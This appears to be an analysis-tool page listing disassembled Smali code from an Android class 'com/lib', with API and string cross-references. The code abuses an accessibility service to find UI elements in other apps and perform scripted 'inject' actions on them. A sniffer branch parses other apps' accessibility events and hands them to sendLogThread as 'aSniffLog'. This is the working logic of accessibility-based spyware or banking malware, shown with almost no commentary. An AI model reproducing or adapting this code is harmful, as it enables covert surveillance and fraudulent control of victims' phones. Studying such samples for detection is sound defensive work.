                        600sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        602invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        603try_end_31d: goto/16 :goto_b3
                        604cond_31f: move v0, v1
                        605move v3, v1
                        606goto/16 :goto_213
                        607cond_323:
                        608invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        609move-result-object v8
                        611const-string v9, "options"
                        613invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        614move-result-object v8
                        616const-string v9, "skip"
                        618invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        619move-result v8
                        620if-nez v8, :cond_3a3
                        622invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        623move-result-object v8
                        625const-string v9, "options"
                        627invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        628move-result-object v8
                        630invoke-direct {p0, v8}, Lcom/lib;->checkSkip(Lorg/json/JSONObject;)Z
                        631try_end_342: move-result v8
                        632if-eqz v8, :cond_3a3
                        633try_start_345:
                        634sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        636invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        637try_end_34a: goto/16 :goto_b3
                        638cond_34c:
                        639invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        640move-result v8
                        641const/16 v9, 0x20
                        642if-eq v8, v9, :cond_3a3
                        644sget-object v0, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        646invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        647move-result v0
                        649sget-object v5, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        651invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        652try_end_35f: move-result v5
                        653if-ge v0, v5, :cond_3a0
                        654move v0, v4
                        655goto_363:
                        656sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        658sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        660invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        661move-result v4
                        662add-int/lit8 v4, v4, 0x1
                        664invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        665move-result-object v4
                        666sput-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        667try_end_373: goto/16 :goto_223
                        668catch_375: move-exception v3
                        669move v4, v0
                        670goto_377: new-instance v0, Ljava/lang/StringBuilder;
                        672invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        674const-string v5, "Could not parse malformed Injects: \""
                        676invoke-virtual {v0, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        677move-result-object v0
                        679sget-object v5, Lcom/lib;->injectJSON:Ljava/lang/String;
                        681invoke-virtual {v0, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        682move-result-object v0
                        684const-string v5, "\""
                        686invoke-virtual {v0, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        687move-result-object v0
                        689invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        690move-result-object v0
                        692invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        694invoke-virtual {v3}, Ljava/lang/Throwable;->toString()Ljava/lang/String;
                        695move-result-object v0
                        697invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        698try_end_39c: move v0, v4
                        699move v3, v1
                        700goto/16 :goto_223
                        701cond_3a0: move v0, v1
                        702move v3, v1
                        703goto/16 :goto_363
                        704cond_3a3:
                        705invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        706move-result-object v8
                        708const-string v9, "exist"
                        710invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        711move-result v8
                        712if-nez v8, :cond_3ea
                        714invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        715move-result-object v8
                        717const-string v9, "exist"
                        719invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        720move-result-object v8
                        722invoke-direct {p0, v6, v8}, Lcom/lib;->checkExist(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        723move-result v8
                        724if-nez v8, :cond_3ea
                        726sget-object v0, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        728invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        729move-result v0
                        731sget-object v5, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        733invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        734try_end_3ca: move-result v5
                        735if-ge v0, v5, :cond_3e7
                        736move v0, v4
                        737goto_3ce:
                        738sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        740sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        742invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        743move-result v4
                        744add-int/lit8 v4, v4, 0x1
                        746invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        747move-result-object v4
                        748sput-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        749try_end_3de: goto/16 :goto_223
                        750catchall_3e0: move-exception v0
                        751try_start_3e1:
                        752sget-object v1, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        754invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        755throw v0
                        756try_end_3e7: move v0, v1
                        757move v3, v1
                        758goto/16 :goto_3ce
                        759try_start_3ea:
                        760invoke-direct {p0}, Lcom/lib;->cleanError()V
                        762invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        763move-result-object v8
                        765const-string v9, "error"
                        767invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        768move-result v8
                        769if-nez v8, :cond_406
                        771invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        772move-result-object v8
                        774const-string v9, "error"
                        776invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        777move-result-object v8
                        779invoke-direct {p0, v8}, Lcom/lib;->setInjectError(Lorg/json/JSONObject;)V
                        780cond_406: if-eqz v3, :cond_47b
                        782invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        783move-result-object v0
                        785const-string v8, "isNext"
                        787invoke-virtual {v0, v8}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        788move-result v0
                        789if-nez v0, :cond_41e
                        791invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        792move-result-object v0
                        794const-string v8, "isNext"
                        796invoke-virtual {v0, v8}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        797move-result v2
                        798cond_41e:
                        799invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        800move-result-object v0
                        802invoke-direct {p0, v6, v0}, Lcom/lib;->makeAction(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        803move-result v0
                        805invoke-static {v0}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        806move-result-object v0
                        807new-instance v8, Ljava/lang/StringBuilder;
                        809invoke-direct {v8}, Ljava/lang/StringBuilder;-><init>()V
                        811const-string v9, "result: "
                        813invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        814move-result-object v8
                        816invoke-virtual {v8, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        817move-result-object v8
                        819const-string v9, " injectStep: "
                        821invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        822move-result-object v8
                        824sget-object v9, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        826invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        827move-result-object v8
                        829invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        830move-result-object v8
                        832invoke-virtual {p0, v8}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        834invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        835move-result v0
                        836if-nez v0, :cond_457
                        837move v0, v1
                        838move v2, v1
                        839move v3, v1
                        840goto/16 :goto_223
                        841cond_457: const/4 v0, 0x0
                        843invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        844move-result-object v0
                        845sput-object v0, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        846const/4 v0, 0x0
                        847sput-boolean v0, Lcom/lib;->searchRetriesSET:Z
                        849sget-object v0, Lcom/lib;->searchRetriesMAXconst:Ljava/lang/Integer;
                        850sput-object v0, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        851if-eqz v2, :cond_47a
                        853sget-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        855sget-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        857invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        858move-result v0
                        859add-int/lit8 v0, v0, 0x1
                        861invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        862move-result-object v0
                        863sput-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        864move v0, v1
                        865goto/16 :goto_223
                        866cond_47a: move v0, v4
                        867cond_47b: add-int/lit8 v5, v5, 0x1
                        869sget-object v8, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        871sget-object v8, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        873invoke-virtual {v8}, Ljava/lang/Integer;->intValue()I
                        874move-result v8
                        875add-int/lit8 v8, v8, 0x1
                        877invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        878move-result-object v8
                        879sput-object v8, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        880try_end_48d: goto/16 :goto_13a
                        881catch_48f: move-exception v0
                        882move-object v3, v0
                        883move v4, v1
                        884goto/16 :goto_377
                        885catch_494: move-exception v0
                        886try_start_495: new-instance v1, Ljava/lang/StringBuilder;
                        888invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        890const-string v2, "[func] [aInjResult] T: "
                        892invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        893move-result-object v1
                        895invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        896move-result-object v0
                        898invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        899move-result-object v0
                        901invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        902try_end_4ab: goto/16 :goto_2f7
                        903cond_4ad: sget-boolean v0, Lcom/lib;->isA11ySniffer:Z
                        904if-eqz v0, :cond_b3
                        905try_start_4b1:
                        906sget-object v0, Lcom/lib;->eventsList:Ljava/util/List;
                        908invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        909move-result v1
                        911invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        912move-result-object v1
                        914invoke-interface {v0, v1}, Ljava/util/List;->contains(Ljava/lang/Object;)Z
                        915move-result v0
                        916if-eqz v0, :cond_b3
                        918iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        920const-string v1, "aSniffPrefs"
                        922invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        923move-result-object v2
                        925invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        926move-result-object v2
                        928invoke-virtual {p0, v0, v1, v2}, Lcom/lib;->isNeedASniff(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        929move-result v0
                        930if-eqz v0, :cond_b3
                        931sget-boolean v0, Lcom/lib;->isA11yInjected:Z
                        932if-eqz v0, :cond_4e3
                        934invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        935move-result-object v0
                        937sget-object v1, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        939invoke-virtual {v0, v1}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        940move-result v0
                        941if-nez v0, :cond_b3
                        942cond_4e3:
                        943invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        944move-result-object v0
                        946invoke-virtual {v0}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        947move-result-object v0
                        949invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        951iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        953const-string v1, "aSniffLog"
                        955invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        956move-result-object v2
                        958invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        959move-result-object v2
                        961invoke-virtual {p0, v0, v1, v2}, Lcom/lib;->sendLogThread(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
                        962try_end_4fd: goto/16 :goto_b3
                        963catch_4ff: move-exception v0
                        964new-instance v1, Ljava/lang/StringBuilder;
                        966invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        968const-string v2, "[func] [doInject] snifferMutex error: "
                        970invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        971move-result-object v1
                        973invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        974move-result-object v0
                        976invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        977move-result-object v0
                        979invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        980goto/16 :goto_b3
                        981catch_518: move-exception v0
                        982move-object v3, v0
                        983move v4, v1
                        984move v2, v1
                        985goto/16 :goto_377
                        986catch_51e: move-exception v2
                        987goto/16 :goto_97
                        988cond_521: move v0, v1
                        989goto/16 :goto_223
                        990cond_524: move v0, v1
                        991move v2, v1
                        992goto/16 :goto_223
                        993cond_528: move v3, v4
                        994goto/16 :goto_a6
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.lang.String.hashCode
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • org.json.JSONObject.isNull
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.isNull
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.isNull
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.isNull
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getString
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getString
                        • android.view.accessibility.AccessibilityNodeInfo.getParent
                        • org.json.JSONObject.getInt
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • id
                        • [id] [
                        • ]element:
                        • byText
                        • [byText] element:
                        • byDesc
                        • [byDesc] element:
                        • byChild
                        • parent
                        • child
                        • 2child
                        • 3child
                        • root
                        • text
                        • parentText
                        • position
                        • bySelf
                        • 2position
                        • 3position
                        • cid
                        • getElement[cid]:
                        • pid
                        • getElement[pid]:
                        • check
                        • level
                        • ctext
                        • [text] getElement[cid]:
                        • ptext
                        • [text] getElement[pid]:
                        • pText
                        • getElement[T]:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v4, 0x1
                        2const/4 v2, 0x0
                        3const/4 v0, 0x0
                        4try_start_3:
                        5invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        6move-result-object v1
                        7if-eqz v1, :cond_321
                        9invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        10move-result-object v1
                        11goto_d:
                        12sget-object v3, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        14invoke-virtual {v3}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        15move-result-object v3
                        16if-eqz v3, :cond_31e
                        18sget-object v1, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        20invoke-virtual {v1}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        21move-result-object v1
                        22move-object v5, v1
                        23goto_1c:
                        24const-string v1, "id"
                        26invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        27move-result v1
                        28if-nez v1, :cond_31b
                        30const-string v1, "id"
                        32invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        33move-result-object v1
                        35invoke-virtual {p0, v5, v1}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        36move-result-object v1
                        37new-instance v3, Ljava/lang/StringBuilder;
                        39invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        41const-string v6, "[id] ["
                        43invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        44move-result-object v3
                        46const-string v6, "id"
                        48invoke-virtual {p2, v6}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        49move-result-object v6
                        51invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52move-result-object v3
                        54const-string v6, "]element: "
                        56invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57move-result-object v3
                        59invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        60move-result-object v3
                        62invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        63move-result-object v3
                        65invoke-virtual {p0, v3}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        66goto_54:
                        67const-string v3, "byText"
                        69invoke-virtual {p2, v3}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        70move-result v3
                        71if-nez v3, :cond_7e
                        72if-nez v1, :cond_7e
                        74const-string v1, "byText"
                        76invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        77move-result-object v1
                        79invoke-direct {p0, v5, v1}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        80move-result-object v1
                        81new-instance v3, Ljava/lang/StringBuilder;
                        83invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        85const-string v6, "[byText] element: "
                        87invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        88move-result-object v3
                        90invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        91move-result-object v3
                        93invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        94move-result-object v3
                        96invoke-virtual {p0, v3}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        97cond_7e:
                        98const-string v3, "byDesc"
                        100invoke-virtual {p2, v3}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        101move-result v3
                        102if-nez v3, :cond_a8
                        103if-nez v1, :cond_a8
                        105const-string v1, "byDesc"
                        107invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        108move-result-object v1
                        110invoke-direct {p0, v5, v1}, Lcom/lib;->getElementByDesc(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        111move-result-object v1
                        112new-instance v3, Ljava/lang/StringBuilder;
                        114invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        116const-string v6, "[byDesc] element: "
                        118invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        119move-result-object v3
                        121invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        122move-result-object v3
                        124invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        125move-result-object v3
                        127invoke-virtual {p0, v3}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        128cond_a8:
                        129const-string v3, "byChild"
                        131invoke-virtual {p2, v3}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        132move-result v3
                        133if-nez v3, :cond_123
                        134if-nez v1, :cond_123
                        136const-string v3, "byChild"
                        138invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        139move-result-object v6
                        140const/4 v3, -0x1
                        142invoke-virtual {v6}, Ljava/lang/String;->hashCode()I
                        143move-result v7
                        144sparse-switch v7, :sswitch_data_324
                        145cond_c0: move v2, v3
                        146goto_c1: packed-switch v2, :pswitch_data_346
                        147move-object p1, v0
                        148goto_c5: return-object p1
                        149sswitch_c6:
                        150const-string v4, "parent"
                        152invoke-virtual {v6, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        153move-result v4
                        154if-eqz v4, :cond_c0
                        155goto/16 :goto_c1
                        156sswitch_cf:
                        157const-string v2, "child"
                        159invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        160move-result v2
                        161if-eqz v2, :cond_c0
                        162move v2, v4
                        163goto/16 :goto_c1
                        164sswitch_d9:
                        165const-string v2, "2child"
                        167invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        168move-result v2
                        169if-eqz v2, :cond_c0
                        170const/4 v2, 0x2
                        171goto/16 :goto_c1
                        172sswitch_e3:
                        173const-string v2, "3child"
                        175invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        176move-result v2
                        177if-eqz v2, :cond_c0
                        178const/4 v2, 0x3
                        179goto/16 :goto_c1
                        180sswitch_ed:
                        181const-string v2, "root"
                        183invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        184move-result v2
                        185if-eqz v2, :cond_c0
                        186const/4 v2, 0x4
                        187goto/16 :goto_c1
                        188sswitch_f7:
                        189const-string v2, "id"
                        191invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        192move-result v2
                        193if-eqz v2, :cond_c0
                        194const/4 v2, 0x5
                        195goto/16 :goto_c1
                        196sswitch_101:
                        197const-string v2, "text"
                        199invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        200move-result v2
                        201if-eqz v2, :cond_c0
                        202const/4 v2, 0x6
                        203goto/16 :goto_c1
                        204sswitch_10b:
                        205const-string v2, "parentText"
                        207invoke-virtual {v6, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        208move-result v2
                        209if-eqz v2, :cond_c0
                        210const/4 v2, 0x7
                        211goto/16 :goto_c1
                        212pswitch_115:
                        213invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        214move-result-object v1
                        216const-string v2, "position"
                        218invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        219move-result v2
                        221invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        222move-result-object v1
                        223goto_123:
                        224const-string v2, "bySelf"
                        226invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        227move-result v2
                        228if-nez v2, :cond_135
                        229if-nez v1, :cond_135
                        231const-string v2, "bySelf"
                        233invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        234move-result v2
                        235if-nez v2, :cond_c5
                        236cond_135: if-eqz v1, :cond_318
                        238invoke-direct {p0, v1, p2}, Lcom/lib;->checkElementProperties(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        239move-result v2
                        240if-eqz v2, :cond_318
                        241move-object p1, v1
                        242goto/16 :goto_c5
                        243pswitch_13f:
                        244const-string v1, "position"
                        246invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        247move-result v1
